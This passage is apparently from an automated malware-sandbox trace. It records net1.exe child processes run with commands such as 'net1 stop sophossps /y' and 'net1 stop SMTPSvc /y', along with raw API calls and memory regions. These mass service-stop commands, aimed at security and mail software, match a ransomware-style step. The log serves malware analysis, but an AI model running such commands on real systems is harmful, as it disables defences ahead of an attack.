_String2="SQLSAFEOLRSERVICE") returned 4 [0113.750] _wcsicmp (_String1="prdr", _String2="SQLSAFEOLRSERVICE") returned -3 [0113.750] _wcsicmp (_String1="devrdr", _String2="SQLSAFEOLRSERVICE") returned -15 [0113.750] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSAFEOLRSERVICE") returned -7 [0113.750] _wcsicmp (_String1="server", _String2="SQLSAFEOLRSERVICE") returned -12 [0113.750] _wcsicmp (_String1="svr", _String2="SQLSAFEOLRSERVICE") returned 5 [0113.751] _wcsicmp (_String1="srv", _String2="SQLSAFEOLRSERVICE") returned 1 [0113.751] _wcsicmp (_String1="lanmanserver", _String2="SQLSAFEOLRSERVICE") returned -7 [0113.751] _wcsicmp (_String1="alerter", _String2="SQLSAFEOLRSERVICE") returned -18 [0113.751] _wcsicmp (_String1="netlogon", _String2="SQLSAFEOLRSERVICE") returned -5 [0113.751] NetServiceControl (in: servername=0x0, service="SQLSAFEOLRSERVICE", opcode=0x0, arg=0x0, bufptr=0xaf870 | out: bufptr=0xaf870) returned 0x889 [0113.752] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.752] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.753] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.754] GetFileType (hFile=0xb) returned 0x2 [0113.755] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0113.755] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xaf730*=0x1e) returned 1 [0113.755] GetFileType (hFile=0xb) returned 0x2 [0113.756] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0113.756] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xaf730*=0x2) returned 1 [0113.756] _ultow (in: _Dest=0x889, _Radix=718752 | out: _Dest=0x889) returned="2185" [0113.756] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.757] GetFileType (hFile=0xb) returned 0x2 [0113.757] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0113.757] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xaf730*=0x34) returned 1 [0113.757] GetFileType (hFile=0xb) returned 0x2 [0113.758] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0113.758] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xaf730*=0x2) returned 1 [0113.759] NetApiBufferFree (Buffer=0x1b4d60) returned 0x0 [0113.759] NetApiBufferFree (Buffer=0x1bc120) returned 0x0 [0113.759] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" [0113.759] exit (_Code=2) Process: id = "299" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x24c05000" os_pid = "0x1278" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "262" os_parent_pid = "0xe5c" cmd_line = "C:\\Windows\\system32\\net1 stop SMTPSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10782 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10783 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10784 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10785 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10786 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10787 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10788 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10789 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10790 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10791 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10792 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10793 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10794 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10795 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10796 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10945 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10946 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10947 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10948 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 10949 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10950 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10951 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10952 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10953 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10954 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10955 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10956 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10957 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10958 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10959 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10960 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10961 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10962 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10963 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10964 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10965 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10966 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10967 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10995 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 801 os_tid = 0x11f4 [0113.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fcd0 | out: lpSystemTimeAsFileTime=0x20fcd0*(dwLowDateTime=0xf8f7cd10, dwHighDateTime=0x1d48689)) [0113.776] GetCurrentProcessId () returned 0x1278 [0113.776] GetCurrentThreadId () returned 0x11f4 [0113.776] GetTickCount () returned 0x2623b [0113.776] QueryPerformanceCounter (in: lpPerformanceCount=0x20fcd8 | out: lpPerformanceCount=0x20fcd8*=1816069400000) returned 1 [0113.777] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.778] __set_app_type (_Type=0x1) [0113.778] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.778] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.778] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.778] GetConsoleOutputCP () returned 0x1b5 [0113.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.778] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.781] sprintf_s (in: _DstBuf=0x20fc78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.781] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.783] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.783] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SMTPSvc /y" [0113.783] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fa10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.783] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.783] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fc68 | out: Buffer=0x20fc68*=0x2f4d40) returned 0x0 [0113.783] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fc68 | out: Buffer=0x20fc68*=0x2fc0e0) returned 0x0 [0113.783] _fileno (_File=0x7fefdba2a80) returned 0 [0113.783] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.783] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.783] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.783] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.784] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.784] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.784] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.784] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.784] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.784] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.784] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.784] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.784] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.784] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.784] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.784] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.784] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.784] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.784] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.784] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.784] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.784] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.784] _wcsicmp (_String1="accounts", _String2="SMTPSvc") returned -18 [0113.784] _wcsicmp (_String1="computer", _String2="SMTPSvc") returned -16 [0113.784] _wcsicmp (_String1="config", _String2="SMTPSvc") returned -16 [0113.784] _wcsicmp (_String1="continue", _String2="SMTPSvc") returned -16 [0113.784] _wcsicmp (_String1="cont", _String2="SMTPSvc") returned -16 [0113.784] _wcsicmp (_String1="file", _String2="SMTPSvc") returned -13 [0113.784] _wcsicmp (_String1="files", _String2="SMTPSvc") returned -13 [0113.784] _wcsicmp (_String1="group", _String2="SMTPSvc") returned -12 [0113.784] _wcsicmp (_String1="groups", _String2="SMTPSvc") returned -12 [0113.784] _wcsicmp (_String1="help", _String2="SMTPSvc") returned -11 [0113.784] _wcsicmp (_String1="helpmsg", _String2="SMTPSvc") returned -11 [0113.784] _wcsicmp (_String1="localgroup", _String2="SMTPSvc") returned -7 [0113.784] _wcsicmp (_String1="pause", _String2="SMTPSvc") returned -3 [0113.784] _wcsicmp (_String1="session", _String2="SMTPSvc") returned -8 [0113.784] _wcsicmp (_String1="sessions", _String2="SMTPSvc") returned -8 [0113.785] _wcsicmp (_String1="sess", _String2="SMTPSvc") returned -8 [0113.785] _wcsicmp (_String1="share", _String2="SMTPSvc") returned -5 [0113.785] _wcsicmp (_String1="start", _String2="SMTPSvc") returned 7 [0113.785] _wcsicmp (_String1="stats", _String2="SMTPSvc") returned 7 [0113.785] _wcsicmp (_String1="statistics", _String2="SMTPSvc") returned 7 [0113.785] _wcsicmp (_String1="stop", _String2="SMTPSvc") returned 7 [0113.785] _wcsicmp (_String1="time", _String2="SMTPSvc") returned 1 [0113.785] _wcsicmp (_String1="user", _String2="SMTPSvc") returned 2 [0113.785] _wcsicmp (_String1="users", _String2="SMTPSvc") returned 2 [0113.785] _wcsicmp (_String1="msg", _String2="SMTPSvc") returned -6 [0113.785] _wcsicmp (_String1="messenger", _String2="SMTPSvc") returned -6 [0113.785] _wcsicmp (_String1="receiver", _String2="SMTPSvc") returned -1 [0113.785] _wcsicmp (_String1="rcv", _String2="SMTPSvc") returned -1 [0113.785] _wcsicmp (_String1="netpopup", _String2="SMTPSvc") returned -5 [0113.785] _wcsicmp (_String1="redirector", _String2="SMTPSvc") returned -1 [0113.785] _wcsicmp (_String1="redir", _String2="SMTPSvc") returned -1 [0113.785] _wcsicmp (_String1="rdr", _String2="SMTPSvc") returned -1 [0113.785] _wcsicmp (_String1="workstation", _String2="SMTPSvc") returned 4 [0113.785] _wcsicmp (_String1="work", _String2="SMTPSvc") returned 4 [0113.785] _wcsicmp (_String1="wksta", _String2="SMTPSvc") returned 4 [0113.785] _wcsicmp (_String1="prdr", _String2="SMTPSvc") returned -3 [0113.785] _wcsicmp (_String1="devrdr", _String2="SMTPSvc") returned -15 [0113.785] _wcsicmp (_String1="lanmanworkstation", _String2="SMTPSvc") returned -7 [0113.785] _wcsicmp (_String1="server", _String2="SMTPSvc") returned -8 [0113.785] _wcsicmp (_String1="svr", _String2="SMTPSvc") returned 9 [0113.785] _wcsicmp (_String1="srv", _String2="SMTPSvc") returned 5 [0113.785] _wcsicmp (_String1="lanmanserver", _String2="SMTPSvc") returned -7 [0113.785] _wcsicmp (_String1="alerter", _String2="SMTPSvc") returned -18 [0113.785] _wcsicmp (_String1="netlogon", _String2="SMTPSvc") returned -5 [0113.786] _wcsupr (in: _String="SMTPSvc" | out: _String="SMTPSVC") returned="SMTPSVC" [0113.786] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2fcdf0 [0113.790] GetServiceKeyNameW (in: hSCManager=0x2fcdf0, lpDisplayName="SMTPSVC", lpServiceName=0xff3f5750, lpcchBuffer=0x20fb88 | out: lpServiceName="", lpcchBuffer=0x20fb88) returned 0 [0113.791] _wcsicmp (_String1="msg", _String2="SMTPSVC") returned -6 [0113.791] _wcsicmp (_String1="messenger", _String2="SMTPSVC") returned -6 [0113.791] _wcsicmp (_String1="receiver", _String2="SMTPSVC") returned -1 [0113.791] _wcsicmp (_String1="rcv", _String2="SMTPSVC") returned -1 [0113.791] _wcsicmp (_String1="redirector", _String2="SMTPSVC") returned -1 [0113.792] _wcsicmp (_String1="redir", _String2="SMTPSVC") returned -1 [0113.792] _wcsicmp (_String1="rdr", _String2="SMTPSVC") returned -1 [0113.792] _wcsicmp (_String1="workstation", _String2="SMTPSVC") returned 4 [0113.792] _wcsicmp (_String1="work", _String2="SMTPSVC") returned 4 [0113.792] _wcsicmp (_String1="wksta", _String2="SMTPSVC") returned 4 [0113.792] _wcsicmp (_String1="prdr", _String2="SMTPSVC") returned -3 [0113.792] _wcsicmp (_String1="devrdr", _String2="SMTPSVC") returned -15 [0113.792] _wcsicmp (_String1="lanmanworkstation", _String2="SMTPSVC") returned -7 [0113.792] _wcsicmp (_String1="server", _String2="SMTPSVC") returned -8 [0113.792] _wcsicmp (_String1="svr", _String2="SMTPSVC") returned 9 [0113.792] _wcsicmp (_String1="srv", _String2="SMTPSVC") returned 5 [0113.792] _wcsicmp (_String1="lanmanserver", _String2="SMTPSVC") returned -7 [0113.792] _wcsicmp (_String1="alerter", _String2="SMTPSVC") returned -18 [0113.792] _wcsicmp (_String1="netlogon", _String2="SMTPSVC") returned -5 [0113.792] NetServiceControl (in: servername=0x0, service="SMTPSVC", opcode=0x0, arg=0x0, bufptr=0x20fb90 | out: bufptr=0x20fb90) returned 0x889 [0113.935] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.935] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.936] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.937] GetFileType (hFile=0xb) returned 0x2 [0113.937] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa58 | out: lpMode=0x20fa58) returned 1 [0113.938] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fa50, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fa50*=0x1e) returned 1 [0113.938] GetFileType (hFile=0xb) returned 0x2 [0113.938] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa58 | out: lpMode=0x20fa58) returned 1 [0113.938] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fa50, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fa50*=0x2) returned 1 [0113.939] _ultow (in: _Dest=0x889, _Radix=2161344 | out: _Dest=0x889) returned="2185" [0113.939] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.939] GetFileType (hFile=0xb) returned 0x2 [0113.939] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa58 | out: lpMode=0x20fa58) returned 1 [0113.940] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fa50, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x20fa50*=0x34) returned 1 [0113.940] GetFileType (hFile=0xb) returned 0x2 [0113.940] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fa58 | out: lpMode=0x20fa58) returned 1 [0113.940] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fa50, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x20fa50*=0x2) returned 1 [0113.941] NetApiBufferFree (Buffer=0x2f4d40) returned 0x0 [0113.941] NetApiBufferFree (Buffer=0x2fc0e0) returned 0x0 [0113.941] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SMTPSvc /y" [0113.941] exit (_Code=2) Process: id = "300" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6b15f000" os_pid = "0x11d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "268" os_parent_pid = "0xf24" cmd_line = "C:\\Windows\\system32\\net1 stop sophossps /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10797 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10798 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10799 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10800 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10801 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10802 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10803 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10804 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10805 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10806 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10807 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10808 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10809 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10810 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10811 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10812 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10813 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10814 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10815 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 10816 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 10817 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10818 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10819 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 